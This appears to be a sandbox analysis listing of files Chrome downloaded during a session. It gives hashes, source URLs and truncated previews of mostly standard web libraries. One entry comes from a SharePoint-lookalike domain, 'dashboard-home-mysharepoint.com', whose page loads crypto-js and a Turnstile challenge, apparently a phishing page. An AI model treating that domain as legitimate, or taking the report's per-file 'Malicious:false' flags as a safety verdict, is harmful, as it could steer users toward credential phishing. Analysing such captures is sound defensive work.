                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1991)
                                        Category:downloaded
                                        Size (bytes):2328
                                        Entropy (8bit):5.288966012768303
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A30F101A180426E08A6B68B5705810F9
                                        SHA1:4BFA1D6A701F2DC8F34BFBB5237C978A799171C0
                                        SHA-256:35E38C13207686FF7836FB1A81E55BEFFC957037981CA72E663973BA300616AF
                                        SHA-512:9941D09DA1679835321D916EC0976FB06B7FD6ECB5CA08A3199918F63EFA266BA5668F4A8B75C5016E952EA3FA80568167508FA2C9734F3C1A50EC94FD212A57
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js
                                        Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/jquery.session@1.0.0/jquery.session.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(e){e.session={_id:null,_cookieCache:void 0,_init:function(){window.name||(window.name=Math.random()),this._id=window.name,this._initCache();var e=new RegExp(this._generatePrefix()+"=([^;]+);").exec(document.cookie);if(e&&document.location.protocol!==e[1])for(var t in this._clearSession(),this._cookieCache)try{window.sessionStorage.setItem(t,this._cookieCache[t])}catch(e){}document.cookie=this._generatePrefix()+"="+document.location.protocol+";path=/;expires="+new Date((new Date).getTime()+12e4).toUTCString()},_generatePrefix:function(){return"__session:"+this._id+":"},_initCache:function(){var e=document.cookie.split(";");for(var t in this._cookieCache={},e){var i=e[t].split("=");new RegExp(this._generatePrefix()+".+").test(i[0])&&i[1]&&
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1993)
                                        Category:dropped
                                        Size (bytes):2333
                                        Entropy (8bit):5.3037723566289285
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C0AC9C9487D60DE96DC68DBB25BD8DD6
                                        SHA1:99419B0BE4B85422FF84870E54DBD8A52DC6DAB1
                                        SHA-256:76AD6584AC5BDD459939DC7532FAE7C2BDD8E22D773FF16D2306F42A1FFC569C
                                        SHA-512:C62F8DF47104F7B878772DCCA4AEA04D11AB1144E73492BF5E49B9FC92582EB23C7F7ED8A580214F7772506A47602815311D2F3EE3AC3C9B8AA4AADE319BA1D7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/**. * Minified by jsDelivr using UglifyJS v3.0.24.. * Original file: /npm/jquery.session@1.0.0/jquery.session.js. * . * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(e){e.session={_id:null,_cookieCache:void 0,_init:function(){window.name||(window.name=Math.random()),this._id=window.name,this._initCache();var e=new RegExp(this._generatePrefix()+"=([^;]+);").exec(document.cookie);if(e&&document.location.protocol!==e[1]){this._clearSession();for(var t in this._cookieCache)try{window.sessionStorage.setItem(t,this._cookieCache[t])}catch(e){}}document.cookie=this._generatePrefix()+"="+document.location.protocol+";path=/;expires="+new Date((new Date).getTime()+12e4).toUTCString()},_generatePrefix:function(){return"__session:"+this._id+":"},_initCache:function(){var e=document.cookie.split(";");this._cookieCache={};for(var t in e){var i=e[t].split("=");new RegExp(this._generatePrefix()+".+").test(i[0])&&i
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):72
                                        Entropy (8bit):4.241202481433726
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (864), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):8538
                                        Entropy (8bit):4.91991691141406
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9E9F926676CD8C66B3A76FD70BF5AF1A
                                        SHA1:206F55233FED1D00B5728CAF627460CF99054DD3
                                        SHA-256:948CDFD81B742AF75D0440E83B153810E073D453441508D4520E11813954A13A
                                        SHA-512:F57907E7ECD375887EB5313878DDADA643093AF7CBE17FB4CAB1F71DBF048A9DE13D77026DFFFE48833B85A322F66B7BBE3C2100B44A0CD2428855F9A943476B
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://dashboard-home-mysharepoint.com/favicon.ico
                                        Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="robots" content="noindex, nofollow" />.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>.. body,.. html {.. height: 100%;.. margin: 0;.. display: flex;.. align-items: center;.. justify-content: center;.. }.. @keyframes bounce {.. 0%,.. 100%,.. 12.5%,.. 32.5%,.. 76.1% {.. transform: translateY(0);.. }.. 22.5%,.. 86% {.. transform: translateY(7px);.. }.. }.. #lacquer {.. height: 179px;.. width: 130px;.. overflow: hidden;.. margin-top: -59px;.. margin-left: 25px;.. }.. @keyframes shadow-fade {.. 0%,.. 100%,.. 21.2%,.. 8
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (871)
                                        Category:downloaded
                                        Size (bytes):920
                                        Entropy (8bit):5.23981480367007
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:810463C3E7DB6F6CD79470456FA4E09E
                                        SHA1:47F48B0E06C323A21794DC9838A41310B2E0B7BB
                                        SHA-256:E40D6A96069A22C6D0DAB01A689A082599DC32B3BCBB1A6AE35896817EA32694
                                        SHA-512:4546CAD5EB9F359231755BDCE91AD637613BC9B5538781E2FB0B69550FD7B28B52ABDC3FCD1A9F8B719B7602577749415CD221C87D5965C2FC25162E97290B53
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/mf_shared/451.6012e266c2.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_mf_shared=self.webpackChunk_microsoft_powerpages_mf_shared||[]).push([[451],{6451:(e,t,s)=>{s.r(t),s.d(t,{createStore:()=>o,default:()=>a});const r=e=>{let t;const s=new Set,r=(e,r)=>{const o="function"==typeof e?e(t):e;if(!Object.is(o,t)){const e=t;t=(null!=r?r:"object"!=typeof o)?o:Object.assign({},t,o),s.forEach((s=>s(t,e)))}},o=()=>t,a={setState:r,getState:o,subscribe:e=>(s.add(e),()=>s.delete(e)),destroy:()=>{console.warn("[DEPRECATED] The `destroy` method will be unsupported in a future version. Instead use unsubscribe function returned by subscribe. Everything will be garbage-collected if store is garbage-collected."),s.clear()}};return t=e(r,o,a),a},o=e=>e?r(e):r;var a=e=>(console.warn("[DEPRECATED] Default export is deprecated. Instead use import { createStore } from 'zustand/vanilla'."),o(e))}}]);.//# sourceMappingURL=451.6012e266c2.chunk.js.map
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):2859
                                        Entropy (8bit):7.9113589947813105
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2B04B89DC736FF2CC5BC45E7A8A24EC6
                                        SHA1:3D1E3B6B35BD52C192935BD9012D05B2560F9F8B
                                        SHA-256:A86B128160561F2D4D3B35AB94874F950918D4551B6036D707EB312A50805C69
                                        SHA-512:0C332B48768F6EA334777D7E8820EB9F3F76F4864F2BD5386019C853F32B821F37D9A75C704C8F6E72677B37BBA19F11249B53794FA9AA708F81E788113EF88C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...@...@......iq.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx..[kL...>wv!v.[..g.5~@.z!..I....i%.M.(Up....c.T..m(QSaG...n...?.:.AJk.e..N!...RR.k%P@....I.....2x...c.].I...;3{.9.;.s.Q....P..._.....<..,.g$...u...7X.z5M.....{.d.R.F)@......vi.v.M.9.!..q.t....~J2.&...:ki..~..<..V.[....h.t5.$`....x.U.eQz...Me6..).y..[.w?.vM.'..a.}.'.D."!..n..d.]...>'.Z~/.[FK.YL...dA'.v..$B....D.pq.&*y4.r..n. .9.I=.... !kp$..W.....,..b....1...Xk.%:y.o4:~.R..s!.Vk{..y.W..C......,.g....w.c.c....S.q%tF...'~ng.-.xK...|......;X&L....vR.....>........{..Y..J./T....Aq.1.;&o...."/.f....A...dXp.W>...k...c`.cr.;B0..w..#..$..7...r..:~.h..u\"+`....Y..>8f...kb9...G=}6...'(. .X...&..c..L..oz...I....~..?...h.e..D...-w.\.......q]..:...]...(.B;.=....=L....1..>$..\...n.g+b.CC-....<...oR..IA.$.Gn.r..tJ8..\.1.."M..'... N..J..3b....4......]..c.S....!.,.X.Xr...J.[TD.M.|C...Wz..*J.0}..N..q......mq7.o:..i......... +...3!pB.d..E...\..8.<......^.u_..'....o.x
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):16
                                        Entropy (8bit):3.875
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:903747EA4323C522742842A52CE710C9
                                        SHA1:9F806EA4288867A31A4AD53AC171AA4029DF182B
                                        SHA-256:4BD8B60F91849C936AE45615145A7B7BE2CF803322A30BABBAE7267A142CA5BB
                                        SHA-512:EEF73DC29A38ED70FFCFC321931BCB5B5A29FAAC356E8F6D84F57C532EEF44AE75021C341CF7DAE26B8211924A1C0E0EC4735F6BFC4AF3970A48EB63BFB7895F
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAl4YGSpxT1w2BIFDYOoWz0=?alt=proto
                                        Preview:CgkKBw2DqFs9GgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (50758)
                                        Category:dropped
                                        Size (bytes):51039
                                        Entropy (8bit):5.247253437401007
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):332
                                        Entropy (8bit):4.474762075707273
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9FCF2D7BB9C8ABF4A524B5DE5DE7475D
                                        SHA1:7F2078946B02F290C63FF9F60CB16168F957DA38
                                        SHA-256:A1DA4868BB4D88126172FA6084C19D66CE973268D8DDD57C7391698A3A2653FA
                                        SHA-512:76A2F09208F18BC7A2798287BDB59B93035357259E21EC25BAD63DA13ADF871933E2698690F83F97CBFE84A4F532CADA917E5A7AD2A3A67AB5FCF4061030B1D3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{. "usePagesStore": {. "library": "mf_shared",. "remoteEntry": "/mf_shared/remoteEntry.da5c406339.js",. "control": "./usePagesStore". },. "FederatedControl": {. "library": "mf_shared",. "remoteEntry": "/mf_shared/remoteEntry.da5c406339.js",. "control": "./FederatedControl". }.}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7625)
                                        Category:downloaded
                                        Size (bytes):7674
                                        Entropy (8bit):5.1936693801975675
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FBAA8BF626C7A370536A67E0E49FBF2A
                                        SHA1:2E271B643612210C73D4DB20A3E7771830A922C0
                                        SHA-256:C83EE49A30249601960E9B2E2502A41128423F46517BF01E36052EA082317830
                                        SHA-512:2A77B33E37AC901049B0302BEA89A97FB8B21FF9DAFA422FE3CB20693BEE0F65610581BBA1D260D416FF650CEA2022857FED202610F205CB315C4FDB24ACBF18
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/mf_shared/465.b7a24572be.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_mf_shared=self.webpackChunk_microsoft_powerpages_mf_shared||[]).push([[465],{4465:(e,t,r)=>{r.r(t),r.d(t,{immer:()=>G});var n=Symbol.for("immer-nothing"),o=Symbol.for("immer-draftable"),i=Symbol.for("immer-state");function c(e,...t){throw new Error(`[Immer] minified error nr: ${e}. Full error at: https://bit.ly/3cXEKWf`)}var s=Object.getPrototypeOf;function a(e){return!!e&&!!e[i]}function u(e){return!!e&&(_(e)||Array.isArray(e)||!!e[o]||!!e.constructor?.[o]||y(e)||b(e))}var f=Object.prototype.constructor.toString();function _(e){if(!e||"object"!=typeof e)return!1;const t=s(e);if(null===t)return!0;const r=Object.hasOwnProperty.call(t,"constructor")&&t.constructor;return r===Object||"function"==typeof r&&Function.toString.call(r)===f}function l(e,t){0===p(e)?Object.entries(e).forEach((([r,n])=>{t(r,n,e)})):e.forEach(((r,n)=>t(n,r,e)))}function p(e){const t=e[i];return t?t.type_:Array.isArray(e)?1:y(e)?2:b(e)?3:0}function d(e,t){return
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (8056)
                                        Category:dropped
                                        Size (bytes):8107
                                        Entropy (8bit):5.396289642985899
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D3731DA994BF920D64003D85A6782E36
                                        SHA1:79A773FF21167D37580E23572F5E5F510CFBC18B
                                        SHA-256:CC8BA88143F2B569B2C0AE78179A10A22AB2303346117B165BA9E160F29024AA
                                        SHA-512:AD313682D4A13F61585CB1488CF5495EBECDD6476409F27EAB9736B1A1D17FE4CBADC2B29DB04F5EBCBD1196DAC7139F9934B8257CCFDD89FCD648F0AE9741D4
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:var mf_shared;(()=>{"use strict";var e,r,t,a,n,o,i,l,f,u,s,d,c,h,p,m,v,g,b,y={9449:(e,r,t)=>{var a={"./usePagesStore":()=>t.e(111).then((()=>()=>t(6111))),"./FederatedControl":()=>Promise.all([t.e(370),t.e(5),t.e(966)]).then((()=>()=>t(3717)))},n=(e,r)=>(t.R=r,r=t.o(a,e)?a[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),t.R=void 0,r),o=(e,r)=>{if(t.S){var a="default",n=t.S[a];if(n&&n!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return t.S[a]=e,t.I(a,r)}};t.d(r,{get:()=>n,init:()=>o})}},w={};function S(e){var r=w[e];if(void 0!==r)return r.exports;var t=w[e]={id:e,loaded:!1,exports:{}};return y[e](t,t.exports,S),t.loaded=!0,t.exports}S.m=y,S.c=w,S.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return S.d(r,{a:r}),r},S.d=(e,r)=>{for(var t in r)S.o(r,t)&&!S.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},S.f={},S.e=e=>Promise.all(Object.keys(S.f).reduc
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (967)
                                        Category:downloaded
                                        Size (bytes):4134
                                        Entropy (8bit):5.29236405035397
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6542A3C35A3BF2447DF5641D6760C676
                                        SHA1:E53906C3E9CA6F3B650889279F8B91428BFDA8F6
                                        SHA-256:1062133029E82519F321658217B98A19BB23C7E30DBAE6F0F33B9B5DE7283D86
                                        SHA-512:7F3F17F95105A00EB7EC3165FECA87C659280D6CE7D21B2F4B85B9CABA34BD8F4A65F2F75F495B4DD8084A68EE6160876AAB76B1235F63D1670976D8D8AE4501
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/mf_shared/111.75cd25e1fb.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_mf_shared=self.webpackChunk_microsoft_powerpages_mf_shared||[]).push([[111],{6111:(t,e,n)=>{n.r(e),n.d(e,{usePagesStore:()=>f});var o=n(2487),r=n(3954),a=n(6064);const{useSyncExternalStoreWithSelector:u}=a;let s=!1;const i=t=>{"function"!=typeof t&&console.warn("[DEPRECATED] Passing a vanilla store will be unsupported in a future version. Instead use `import { useStore } from 'zustand'`.");const e="function"==typeof t?(0,o.createStore)(t):t,n=(t,n)=>function(t,e=t.getState,n){n&&!s&&(console.warn("[DEPRECATED] Use `createWithEqualityFn` instead of `create` or use `useStoreWithEqualityFn` instead of `useStore`. They can be imported from 'zustand/traditional'. https://github.com/pmndrs/zustand/discussions/1937"),s=!0);const o=u(t.subscribe,t.getState,t.getServerState||t.getState,e,n);return(0,r.useDebugValue)(o),o}(e,t,n);return Object.assign(n,e),n},c=t=>t?i(t):i;var l=n(3768);./*!. * Copyright (C) Microsoft Corporation. All rights re
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):80
                                        Entropy (8bit):4.509183719779188
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F4A0E619B855697F4DB1A1B22FE37E8C
                                        SHA1:3D1CA30185839E05C6D876C7E8477604BFAC6CDA
                                        SHA-256:CEC86F53B19C31BC124614007553A6EBC5434F9B1D2F03B1DB0393B22AB16EA2
                                        SHA-512:8FF46BF8D3B93DA72109C92A26D5FF4C8E16FD6CD98FBB0E6A9E7E31E55220E8B2D71B851219199DF9C6D2074137192F55F84B4B89AF9C4C4D1B9D6FDB94EFC5
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.js
                                        Preview:$(()=>{if(window.loadAllPcfControlsOnPage){window.loadAllPcfControlsOnPage()}});
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:C++ source, ASCII text, with very long lines (8580)
                                        Category:dropped
                                        Size (bytes):45229
                                        Entropy (8bit):5.434680345116486
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:19F504A460BE530F37202A8959CB16DD
                                        SHA1:18371ACEEE9A2FCD84B08B911CD4EB92401E4A4A
                                        SHA-256:70B8672BE9E8C909F6353BF561A70EDC286AFC2FAE037E776330FB37C12F49A0
                                        SHA-512:E98C33EF2C510D1B4009E1D62FAFBB4EFF316496750F58A390BCA6FB9961F86170A21A268880D0BA626D7788555E9D2A0BD14DA1EF7C4ACA673201B08CBDC46E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[637],{7298:(e,t,r)=>{r.r(t),r.d(t,{REACT_DEV_ROOT:()=>Ct,REACT_PROD_ROOT:()=>_t});var o,n,a,l,i=r(7005),c=r.n(i),d=r(9701),s=r.n(d),u=r(157),g=r(7234),p=r(9431),m=r(7301);!function(e){e.PORTAL_NATIVE_CONTROL="PORTAL_NATIVE_CONTROL",e.PORTAL_NATIVE_CONTROL_MANIFEST="PORTAL_NATIVE_CONTROL_MANIFEST",e.PORTAL_NATIVE_CONTROL_ERROR_BOUNDARY="PORTAL_NATIVE_CONTROL_ERROR_BOUNDARY",e.PORTAL_NATIVE_CONTROL_GRID_QUERY="PORTAL_NATIVE_CONTROL_GRID_QUERY",e.PORTAL_NATIVE_CONTROL_THEME="PORTAL_NATIVE_CONTROL_THEME",e.CARD_GALLERY_CONTROL="CARD_GALLERY_CONTROL",e.AI_SUMMARY_FEEDBACK="AI_SUMMARY_FEEDBACK"}(o||(o={})),function(e){e.GRID_NATIVE_CONTROL="GRID_NATIVE_CONTROL",e.GRID_SORTING="GRID_SORTING",e.GRID_STRING_FILTERING="GRID_STRING_FILTERING",e.GRID_NUMBER_FILTERING="GRID_NUMBER_FILTERING",e.GRID_DATE_FILTERING="GRID_DATE_FILTERING",e.GRID_BOOLEAN_FILTERING="GRID_BOOLEAN_FILTERING",e.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                        Category:dropped
                                        Size (bytes):47992
                                        Entropy (8bit):5.605846858683577
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65393), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):219106
                                        Entropy (8bit):5.4854882083117635
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DE96D9B841957A1AF36EC8944F90B161
                                        SHA1:53603D16547475468FB508FF76BFF8F662FE0DB1
                                        SHA-256:0C60BDE2C3B2483E3414EABD19ED93731BF4CD85A0832C5D002357846A61565F
                                        SHA-512:DE5876A31C97CAED2E65A25422B94761D4AC9B3CE233ECF795B9EB78DAABE3B5F056DDF1984D3AEE2AD4A29BF7856170C48964B3D321CA332ED248733EEE5616
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*!.. * 1DS JS SDK Analytics Web, 3.2.8.. * Copyright (c) Microsoft and contributors. All rights reserved... * (Microsoft Internal Only).. */..var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],b=null;function C(e){e=!1===(e=void 0===e||e)?null:b;return e||((e=(e=(e=typeof globalThis!==fe?globalThis:e)||typeof self===fe?e:self)||typeof window===fe?e:window)||typeof global===fe||(e=global),b=e),e}function S(e){throw new TypeError(e)}function M(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(C()||{}).Symbol,(C()||{}).Reflect;var N=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},w=function(e,t){return(w=g.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var n
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (25293)
                                        Category:dropped
                                        Size (bytes):43107
                                        Entropy (8bit):5.26903329129244
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:805A1661B77834F61B0C8E1175DC9F90
                                        SHA1:38E8EEB48DF5906F796E4C9A4549DFBF0327D656
                                        SHA-256:B37275F7C7F76430F05A20E7D0DDDAC3649467DBC0E7AF58CC3F04B1EE6DEA81
                                        SHA-512:45004F96FB51B09AC26A409CA1BE79E48568026B1DEE9F0C55B6E5BB2958820AB96B3F6B5649E1BC7289D8E5D64334EA3882D7248926FE532AC7C7F2A7595142
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:(function(e){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=e()}else if(typeof define==="function"&&define.amd){define([],e)}else{var t;if(typeof window!=="undefined"){t=window}else if(typeof global!=="undefined"){t=global}else if(typeof self!=="undefined"){t=self}else{t=this}t.PropTypes=e()}})(function(){var e,t,r;return function i(a,u,c){function f(r,e){if(!u[r]){if(!a[r]){var t=typeof require=="function"&&require;if(!e&&t)return t(r,!0);if(s)return s(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var o=u[r]={exports:{}};a[r][0].call(o.exports,function(e){var t=a[r][1][e];return f(t?t:e)},o,o.exports,i,a,u,c)}return u[r].exports}var s=typeof require=="function"&&require;for(var e=0;e<c.length;e++)f(c[e]);return f}({1:[function(e,t,r){./**. * Copyright (c) 2013-present, Facebook, Inc.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */."use
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (65300), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):194905
                                        Entropy (8bit):5.014651527034942
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:30EAFD8EF153814B788EB71DB3F1B99C
                                        SHA1:3C7BD538F6307CAE3DE00D64BD2B742B9E4AFE3B
                                        SHA-256:7FCFD614F45FE132CC914BEEAC10592711BF2760E3732D85DFAFEB4022A3C914
                                        SHA-512:82FE723645A952B3609BF3DBA38521D4CDA2B00E95EF7465257B01F3A0BD1EAA2A0D0EBCBB36E4C792296B6739CDDA4862380CCCD0DECBBC786F351E82ED1192
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/bootstrap.min.css
                                        Preview:@charset "UTF-8";/*!.. * Bootstrap v5.2.2 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors.. * Copyright 2011-2022 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (19015)
                                        Category:downloaded
                                        Size (bytes):19188
                                        Entropy (8bit):5.212814407014048
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
